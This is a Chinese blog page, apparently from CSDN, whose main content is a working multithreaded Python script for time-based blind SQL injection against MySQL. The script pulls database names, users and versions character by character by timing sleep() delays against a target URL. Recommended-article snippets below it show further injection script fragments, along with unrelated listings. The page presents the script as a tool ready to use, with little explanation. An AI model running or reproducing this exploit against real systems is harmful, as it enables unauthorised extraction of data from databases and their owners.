python mysql延时注入,突破延时注入的时间限制-python篇

最新推荐文章于 2022-04-13 19:45:22 发布
最新推荐文章于 2022-04-13 19:45:22 发布
阅读量140 收藏
点赞数

SQL注入 Python 多线程 信息泄露 安全防护
关键词由CSDN通过智能技术生成

# -*- coding: utf-8 -*-

import requests

import threading

import datetime

# 公用函数获取数据库,版本,用户名的的长度,参数getType为,user(),database(),version(),

length = 0

def loadDataPublicLength(url,i,getType,afterstr):

if isTrue(url + ' and if(length('+ getType +') = ' + str(i)+ ', sleep(2),1)'+afterstr):

print('得到结果,长度为:'+ str(i))

global length

length = i

getName()

# 公用函数获取名字,参数getType为,user(),database(),version(),

nameStr = {}

def loadDataPublicName(url, i,getType,afterstr):

min = 32

max = 127

while True:

center = int((min + max) / 2)

if isTrue(url + ' and if(ascii(substring('+ getType +',' + str(i) + ',1)) > ' + str(center) +', sleep(2),1)'+ afterstr):

min = center

continue

if isTrue(url + ' and if(ascii(substring('+ getType +',' + str(i) + ',1)) < ' + str(center) +', sleep(2),1)'+ afterstr):

max = center

continue

if isTrue(url + ' and if(ascii(substring('+ getType +',' + str(i) + ',1)) = ' + str(center) +', sleep(2),1)'+ afterstr):

global nameStr

nameStr[i-1]=chr(center)

#print(nameStr)

break

print(nameStr.values())

# 判断是否正确,如果正确返回true

def isTrue(urlStr):

print(urlStr)

starttime = datetime.datetime.now()      # 开始请求URL时间

re = requests.get(urlStr).content.decode('utf8')

endtime = datetime.datetime.now()        # 请求完毕时间

res = (endtime - starttime).seconds

if int(res) >= 2:

return True

else:

return False

#################获取长度

def getLength():

threads1 = []

for j in range(1,20):

t = threading.Thread(target=loadDataPublicLength,args=(url,j,getType,afterstr,))

threads1.append(t)

for t1 in threads1:

#t.setDaemon(True)

t1.start()

t1.join()

################获取名字的线程,线程数取决于获取数据的长度

def getName():

threads2 = []

for j in range(1,length+1):

t = threading.Thread(target=loadDataPublicName,args=(url,j,getType,afterstr,))

threads2.append(t)

for t2 in threads2:

t2.start()

t2.join()

if __name__ == '__main__':

url = 'http://www.nvhack.com/sql/sql.php?id=1\' '   # 延时注入报错网址

afterstr = '--+'                                    # 是否需要注释符号,不用为空

getType = 'database()'

getLength()

weixin_39826089
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用python编写sql时间盲注的exp
CC210231的博客
04-05 1941
前言: 前面学习了布尔盲注的exp,原理是根据页面的两个返回状态来确定注入的语句是否正确执行,从而得到我们想要的数据,但有时候,页面只会返回一种状态,布尔盲注就无法实行了,此时,我们就要用到另一种盲注方式:时间盲注,也叫延时注入 延时注入原理: 延时注入是利用sql语句达到延时的目的,在mysql中用的sleep()函数, select sleep(3) 数据库延时3秒 返回信息。利用这个函数加上if函数进行判断,就可以达到延时注入注入得出数据。 我们在exp中怎样利用呢? 我们可以获
python mysql延时注入_python延迟注入
weixin_42502075的博客
01-28 316
如果要爆数据啥的话就改py代码里面的select%20user(),替换为你要执行的sql即可[cc lang="python"]#!/usr/bin/env python# -*- coding: utf-8 -*-# 延迟注入工具import urllib2import timeimport socketimport threadingimport requestsclass my_threa...
python解决盲注和延迟注入笔记
qq_43571759的博客
03-15 986
python解决盲注和延迟注入笔记 requests模块 要用python解决这一问题需要了解request这个模块,我下载的是pycharm所以自带这个模块不用安装,需要安装的话 pip install requests pip命令执行就能安装成功,然后是关于requests模块的一些函数: get请求 post请求 res=request.get(url,params=dat...
python mysql延时注入_延迟注入工具(python
weixin_39966765的博客
01-27 144
延迟注入工具(python)#!/usr/bin/env python# -*- coding: utf-8 -*-# 延迟注入工具import urllib2import timeimport socketimport threadingimport requestsclass my_threading(threading.Thread):def __init__(self, str,x):th...
python sql延时注入脚本(从数据库名到字段)
m0_61815757的博客
04-13 2664
python sql延时盲注脚本
python3 sleep 延时秒 毫秒实例
09-16
在标题和描述中提到的"python3 sleep 延时秒 毫秒实例",主要展示了如何使用`time.sleep()`函数来让程序暂停执行指定的时间,无论是秒还是毫秒。下面将详细介绍这个函数的使用方法和相关的延时执行策略。 首先,`...
SQL住入原始脚本_SQL注入python脚本_
10-03
2. **延时注入**:这种方法不直接返回查询结果,而是通过改变查询时间来判断数据库中的信息。例如,攻击者可能会构造一个使数据库执行长时间操作的查询,通过测量响应时间来推断信息。这通常用于避免某些安全机制,...
Python-python爬虫由浅入深
08-10
10. 反爬与反反爬:分析常见的网站反爬机制,如User-Agent、Cookies、验证码、IP限制等,以及应对策略,如使用代理IP、设置延时等。 11. 动态网页处理:学习如何处理JavaScript渲染的网页,可以使用Selenium、...
python-extractplo-crawler-amazon-python
02-27
在这个项目"python-extractplo-crawler-amazon-python"中,我们将深入探讨如何利用Python编程语言构建一个亚马逊商品信息的爬虫。这个爬虫可以帮助我们自动化地从亚马逊网站抓取商品数据,例如商品名称、价格、评级...
Python-python实现简单的爬虫数据demo
08-10
同时,为了不给目标服务器带来过大压力,可以设置延时或随机等待时间。 7. **反爬虫策略**:有些网站会设置反爬虫机制,比如检查User-Agent、限制IP访问频率。我们可以修改`requests`的headers参数模拟浏览器行为,...
python实现sql时间盲注
箭雨镜屋
04-26 1010
一、python代码 二、使用方法 三、测试
bugku-Web-INSERT INTO注入(case注入技巧(逗号被过滤的延迟盲注)+延迟注入脚本)
Sea_Sand息禅
03-31 1349
flag格式:flag{xxxxxxxxxxxx} 不如写个Python吧 error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip = $_SERVER['REM...
python操作数据库慢_使用Python将数据写入LMDB非常慢
weixin_39559097的博客
12-09 197
根据我的经验,我已经有50-100毫秒写入LMDB从Python写入在Ubuntu上的ext4硬盘上的Caffe数据.这就是我使用tmpfs(Linux内置的RAM磁盘功能)并在0.07毫秒左右完成这些写入的原因.您可以在ramdisk上创建较小的数据库并将它们复制到硬盘上,然后再对所有数据库进行训练.我正在制作大约20-40GB的内存,因为我有64 GB的内存.一些代码可以帮助您动态创建,填充和...
python链接mysql超过最大默认连接时间_python 连接 mysql 超时,请问怎么解决
weixin_33795883的博客
01-30 1946
MYSQL_OPT_READ_TIMEOUT (argument type: unsigned int *)The timeout in seconds for each attempt to read from the server. There are retries if necessary, so the total effective timeout value is three tim...
python mysql延时注入,Python系列之——时间盲注脚本编写
weixin_39670857的博客
03-25 329
[Python] 纯文本查看 复制代码#!/usr/bin/env python# -*- coding: utf-8 -*-import requestsimport timepayloads = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.' #匹配用的字符串user='' #存匹配到的字符的字...
pymysql 设置超时时间
高压锅博客
05-08 4100
1. 设置超时时间 import pymysql from DBUtils.PooledDB import pooledDB _DB_POOL_ = {} db_dict = { "host": "127.0.0.1", "port": 3306, "user": "root", "passwd": "123456", "db": "utpdb", "maxconnections": 10, "charset": "utf8", "setsession": ['SET AUTOCOMMI
python mysql延时注入_Python:SQLMap源码精读之基于时间的盲注(time-based blind)
weixin_42297665的博客
02-02 578
基于时间的盲注(time-basedblind)测试应用是否存在SQL注入漏洞时,经常发现某一潜在的漏洞难以确认。这可能源于多种原因,但主要是因为Web应用未显示任何错误,因而无法检索任何数据。对于这种情况,要想识别漏洞,向数据库注入时间延迟并检查服务器响应是否也已经延迟会很有帮助。时间延迟是一种很强大的技术,Web服务器虽然可以隐藏错误或数据,但必须等待数据库返回结果,因此可用它来确认是否存在...
python读取mysql数据每次都耗时600秒_就是这么流弊!三行Python代码,让数据处理速度提高2到6倍...
weixin_29248611的博客
02-04 639
幸运的是,Python 库中内建了一些隐藏的特性,可以让我们充分利用所有 CPU 核心的能力。通过使用 Python 的 concurrent.futures 模块,我们只需要 3 行代码就可以让一个普通的程序转换成适用于多核处理器并行处理的程序。标准方法让我们举一个简单的例子,在单个文件夹中有一个图片数据集,其中有数万张图片。在这里,我们决定使用 1000 张。我们希望在所有图片被传递到深度神经...
关于电压互感器的详细介绍.pdf
最新发布
07-20
电压互感器(Voltage Transformer,简称VT),又称电压变压器或电压互感器(PT),是电力系统中不可或缺的重要设备之一。以下是关于电压互感器的详细介绍: 一、定义与功能 电压互感器是一种用于测量高电压并将其转换成低电压信号的电器设备,以便于测量、监测和保护。它主要用于电力系统中测量仪表、继电保护等二次设备获取电气一次回路电压信息的传感器。通过将高电压按比例转换成低电压(如100V或更低),电压互感器使得电力系统中的电压测量、保护和控制变得更加容易和安全。 二、工作原理 电压互感器的工作原理基于电磁感应原理。它通常由高压绕组、低压绕组和磁芯组成。高压绕组与高压电网中的相线相连,低压绕组则与电压表、保护装置等低压设备相连。当高压绕组中有电流通过时,会在绕组中产生磁场,这个磁场会穿过磁芯并感应到低压绕组中,从而在低压绕组中产生电压。由于低压绕组的匝数较多,因此在低压绕组中感应到的电压远低于高压绕组中的电压。 三、类型与分类 根据功能和用途,电压互感器可以分为多种类型。常见的类型包括电磁式电压互感器(如电容式电压互感器,应用广泛)和非电磁式电压互感器(如电子式、光电式等)
Python实现的信息安全语义搜索引擎
"基于python的信息安全领域中语义搜索引擎源码数据库.docx" 本文将探讨一个基于Python技术构建的语义搜索引擎项目,该搜索引擎专为信息安全领域设计,旨在提高信息搜索的效率和服务效果。项目名为“爬虫安全牛”,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值